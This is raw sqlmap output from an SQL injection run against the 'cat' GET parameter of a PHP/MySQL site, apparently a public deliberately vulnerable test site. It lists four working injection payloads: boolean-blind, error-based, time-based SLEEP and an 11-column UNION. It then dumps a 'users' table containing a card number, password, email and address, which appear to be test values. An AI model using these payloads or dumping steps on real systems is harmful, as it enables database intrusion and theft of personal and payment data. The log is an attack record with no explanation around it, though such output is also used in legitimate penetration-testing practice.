        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.2#stable}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:51:46 /2025-05-31/

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: cat=(SELECT (CASE WHEN (4525=4525) THEN 4 ELSE (SELECT 2148 UNION SELECT 2668) END))

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: cat=4 AND GTID_SUBSET(CONCAT(0x7162787671,(SELECT (ELT(1312=1312,1))),0x7178787a71),1312)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cat=4 AND (SELECT 3229 FROM (SELECT(SLEEP(5)))aFFV)

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: cat=4 UNION ALL SELECT NULL,CONCAT(0x7162787671,0x6a7468597477626754467a6c4e6a5356686d4d76646445776e776a51716256736c516c7a4d6f6568,0x7178787a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6

Database: acuart
Table: users
[1 entry]
+---------------------+----------------------------------+------+--------------------+---------+-------+------------+-----------+
| cc                  | cart                             | pass | email              | phone   | uname | name       | address   |
+---------------------+----------------------------------+------+--------------------+---------+-------+------------+-----------+
| 1234-5678-2300-9000 | a5124cc722377f5ebf69539854822fc5 | test | test@teste=2323345 | <blank> | test  | John Smith | 21 street |
+---------------------+----------------------------------+------+--------------------+---------+-------+------------+-----------+


[*] ending @ 05:51:54 /2025-05-31/
